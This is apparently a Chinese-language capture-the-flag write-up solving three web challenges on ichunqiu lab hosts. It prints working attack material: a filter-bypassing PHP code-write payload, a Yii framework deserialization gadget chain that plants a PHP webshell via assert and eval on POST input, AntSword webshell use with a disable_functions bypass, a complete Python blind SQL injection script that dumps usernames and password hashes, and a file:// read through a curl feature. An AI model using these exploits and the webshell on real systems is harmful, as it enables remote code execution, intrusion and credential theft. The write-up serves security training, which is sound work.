Web
find_it
dirsearch扫到个robots.txt,里面放着1ndexx.php
直接访问没有东西,查看swp文件.1ndexx.php.swp
拿到源码
<?php
#Really easy...
$file=fopen("flag.php","r") or die("Unable 2 open!");
$I_know_you_wanna_but_i_will_not_give_you_hhh = fread($file,filesize("flag.php"));
$hack=fopen("hack.php","w") or die("Unable 2 open");
$a=$_GET['code'];
if(preg_match('/system|eval|exec|base|compress|chr|ord|str|replace|pack|assert|preg|replace|create|function|call|\~|\^|\`|flag|cat|tac|more|tail|echo|require|include|proc|open|read|shell|file|put|get|contents|dir|link|dl|var|dump/',$a)){
die("you die");
}
if(strlen($a)>33){
die("nonono.");
}
fwrite($hack,$a);
fwrite($hack,$I_know_you_wanna_but_i_will_not_give_you_hhh);
fclose($file);
fclose($hack);
?>
payload
http://eci-2zegg15ya7y4this8qz2.cloudeci1.ichunqiu.com/index.php?code=%3C?php%20phpinfo();
访问hack.php,flag在环境变量里
framework
yii反序列化rce,源码在www.zip,改一下链子就行了
<?php
namespace yii\rest{
class CreateAction{
public $checkAccess;
public $id;
public function __construct(){
$this->checkAccess = 'assert';
$this->id = 'file_put_contents("shell.php","<?php eval(\$_POST[pass]);");';
}
}
}
namespace Faker{
use yii\rest\CreateAction;
class Generator{
protected $formatters;
public function __construct(){
$this->formatters['close'] = [new CreateAction(), 'run'];
}
}
}
namespace yii\db{
use Faker\Generator;
class BatchQueryResult{
private $_dataReader;
public function __construct(){
$this->_dataReader = new Generator;
}
}
}
namespace{
echo base64_encode(serialize(new yii\db\BatchQueryResult));
}
?>
蚁剑连接http://eci-2ze3l5mg59msjyj8xpg5.cloudeci1.ichunqiu.com/shell.php
蚁剑插件bypass disable_function
WebsiteManger
image.php?id=3处存在注入,手测结果为image.php?id=3/**/or/**/1=1
盲注脚本
import requests
url = 'http://eci-2ze56uon9iidfu8xxa70.cloudeci1.ichunqiu.com/image.php?id=3/**/or/**/1='
def main():
result = ""
for i in range(1, 200):
low = 32
high = 128
while low < high:
mid = int((low + high) / 2)
content = "select/**/group_concat(username,':',password)/**/from/**/users"
# content = "select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database()"
# content = "select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name='users'"
sql = f"if(ascii(substr(({content}),{i},1))<{mid},1,2)"
url2 = url+sql
r = requests.get(url2)
if len(r.content) == 50811:
high = mid
else:
low = mid + 1
if low == high == 32:
print(result)
break
result += chr(int((high + low - 1) / 2))
print(result)
#admin:1288a7689e3c735652a72
if __name__ == '__main__':
main()
登录上去之后有个curl,用file协议读取flag